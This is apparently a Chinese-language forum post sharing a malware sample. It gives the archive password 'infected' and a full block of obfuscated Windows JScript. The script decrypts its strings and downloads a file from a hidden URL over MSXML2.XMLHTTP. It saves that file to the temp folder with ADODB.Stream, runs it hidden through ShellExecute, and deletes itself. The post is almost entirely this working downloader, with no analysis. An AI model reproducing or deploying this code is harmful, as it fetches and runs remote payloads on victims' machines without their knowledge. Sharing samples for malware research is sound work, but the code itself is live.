密碼:infected
opentip:
JS代碼:
function _0x4bf4(_0x5beb2b,_0x4ae6d4){var _0x1c75bb=_0x1c75();return _0x4bf4=function(_0x26cfea,_0x5c4039){_0x26cfea=_0x26cfea-0x77;var _0x41edcc=_0x1c75bb[_0x26cfea];if(_0x4bf4['VwHfNN']===undefined){var _0x35d073=function(_0x525522){var _0x5e8022='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x52796c='',_0x4e7810='';for(var _0x1636eb=0x0,_0x5dc5bc,_0x44ea3e,_0x51f21d=0x0;_0x44ea3e=_0x525522['charAt'](_0x51f21d++);~_0x44ea3e&&(_0x5dc5bc=_0x1636eb%0x4?_0x5dc5bc*0x40+_0x44ea3e:_0x44ea3e,_0x1636eb++%0x4)?_0x52796c+=String['fromCharCode'](0xff&_0x5dc5bc>>(-0x2*_0x1636eb&0x6)):0x0){_0x44ea3e=_0x5e8022['indexOf'](_0x44ea3e);}for(var _0xb0f3d8=0x0,_0x41c108=_0x52796c['length'];_0xb0f3d8<_0x41c108;_0xb0f3d8++){_0x4e7810+='%'+('00'+_0x52796c['charCodeAt'](_0xb0f3d8)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x4e7810);};var _0x4bf4fe=function(_0x2ba041,_0x4f0334){var _0x15b497=[],_0x248151=0x0,_0x1ddab9,_0x184758='';_0x2ba041=_0x35d073(_0x2ba041);var _0x29c439;for(_0x29c439=0x0;_0x29c439<0x100;_0x29c439++){_0x15b497[_0x29c439]=_0x29c439;}for(_0x29c439=0x0;_0x29c439<0x100;_0x29c439++){_0x248151=(_0x248151+_0x15b497[_0x29c439]+_0x4f0334['charCodeAt'](_0x29c439%_0x4f0334['length']))%0x100,_0x1ddab9=_0x15b497[_0x29c439],_0x15b497[_0x29c439]=_0x15b497[_0x248151],_0x15b497[_0x248151]=_0x1ddab9;}_0x29c439=0x0,_0x248151=0x0;for(var _0x6b6e28=0x0;_0x6b6e28<_0x2ba041['length'];_0x6b6e28++){_0x29c439=(_0x29c439+0x1)%0x100,_0x248151=(_0x248151+_0x15b497[_0x29c439])%0x100,_0x1ddab9=_0x15b497[_0x29c439],_0x15b497[_0x29c439]=_0x15b497[_0x248151],_0x15b497[_0x248151]=_0x1ddab9,_0x184758+=String['fromCharCode'](_0x2ba041['charCodeAt'](_0x6b6e28)^_0x15b497[(_0x15b497[_0x29c439]+_0x15b497[_0x248151])%0x100]);}return _0x184758;};_0x4bf4['nbbhZv']=_0x4bf4fe,_0x5beb2b=arguments,_0x4bf4['VwHfNN']=!![];}var _0xd2e45d=_0x1c75bb[0x0],_0x1c7e36=_0x26cfea+_0xd2e45d,_0x17f55c=_0x5beb2b[_0x1c7e36];return!_0x17f55c?(_0x4bf4['mmeLsC']===undefined&&(_0x4bf4['mmeLsC']=!![]),_0x41edcc=_0x4bf4['nbbhZv'](_0x41edcc,_0x5c4039),_0x5beb2b[_0x1c7e36]=_0x41edcc):_0x41edcc=_0x17f55c,_0x41edcc;},_0x4bf4(_0x5beb2b,_0x4ae6d4);}var _0x5dccbc=_0x26cf,_0x538b67=_0x4bf4;function _0x26cf(_0x5beb2b,_0x4ae6d4){var _0x1c75bb=_0x1c75();return _0x26cf=function(_0x26cfea,_0x5c4039){_0x26cfea=_0x26cfea-0x77;var _0x41edcc=_0x1c75bb[_0x26cfea];return _0x41edcc;},_0x26cf(_0x5beb2b,_0x4ae6d4);}(function(_0x5628f0,_0x4e1fa0){var _0xef1ef7=_0x26cf,_0x269b54=_0x4bf4,_0xc3f8df=_0x5628f0();while(!![]){try{var _0x3983e9=parseInt(_0x269b54(0x8b,'jbJ@'))/0x1+-parseInt(_0xef1ef7(0x7b))/0x2+parseInt(_0xef1ef7(0x87))/0x3+-parseInt(_0x269b54(0x77,'yaef'))/0x4+parseInt(_0xef1ef7(0x83))/0x5+-parseInt(_0xef1ef7(0x8d))/0x6+parseInt(_0xef1ef7(0x91))/0x7*(parseInt(_0x269b54(0x8a,'lN)i'))/0x8);if(_0x3983e9===_0x4e1fa0)break;else _0xc3f8df['push'](_0xc3f8df['shift']());}catch(_0x311ae5){_0xc3f8df['push'](_0xc3f8df['shift']());}}}(_0x1c75,0xb7303));var pOut=new ActiveXObject(_0x538b67(0x86,'[kZ%'))['GetSpecialFolder'](0x2)+_0x538b67(0x82,'mtfI'),Object=WScript[_0x5dccbc(0x80)](_0x5dccbc(0x7d));function _0x1c75(){var _0xf5ee47=['ResponseBody','MSXML2.XMLHTTP','grRcPqpcRmoVyCoHqMW','ADODB.Stream','CreateObject','GET','eM9XrmkfF2dcMHlcNmoeWPDEcu7cMW','4929570bSKFim','open','W71ZmKRcK8kzA0tdVSkABNRdRmkvg8k4t8kQW60dlCkBibzQWRO','fdn7W6W4fSoiWR5rpJrhW5SKWOVcQCkzW5xdOgNdNM8WW7TIrq','1705821nkQnpq','Type','Position','jejgW7BdJZJcRmo/WOrB','W6ddUSk7WOvnWQ/dIIy2WPOxBmkB','j8kgsCkGWQBdP8kBi8oAymoirmkHibJdRmonnINcN0q7FJmFWRtcICk4wmorWPpdNadcUCk4zCkDd8okW5pcM8ooW47cKve','4906842qWlRPq','SaveToFile','z8oTWQyThtZcH2znxINcS2a','7824EXvdLG','1547JVMAoh','odFcRmket1pcPIZdN8oWW57cNW','Write','Open','1078236yGtvgI','2305768WwomSe'];_0x1c75=function(){return _0xf5ee47;};return _0x1c75();}Object['Open'](_0x5dccbc(0x81),_0x538b67(0x8c,'09gH'),![]),Object['Send']();var Stream=WScript['CreateObject'](_0x5dccbc(0x7f));Stream[_0x5dccbc(0x79)](),Stream[_0x5dccbc(0x88)]=0x1,Stream[_0x5dccbc(0x78)](Object[_0x5dccbc(0x7c)]),Stream[_0x5dccbc(0x89)]=0x0,Stream[_0x5dccbc(0x8e)](pOut,0x2),Stream['Close'](),new ActiveXObject('Shell.Application')['ShellExecute'](pOut,'','',_0x5dccbc(0x84),'1'),new ActiveXObject(_0x538b67(0x85,'G[fn'))[_0x538b67(0x7e,'8Nh^')](WScript['ScriptFullName']); |
发表于 2022-11-7 15:21:29
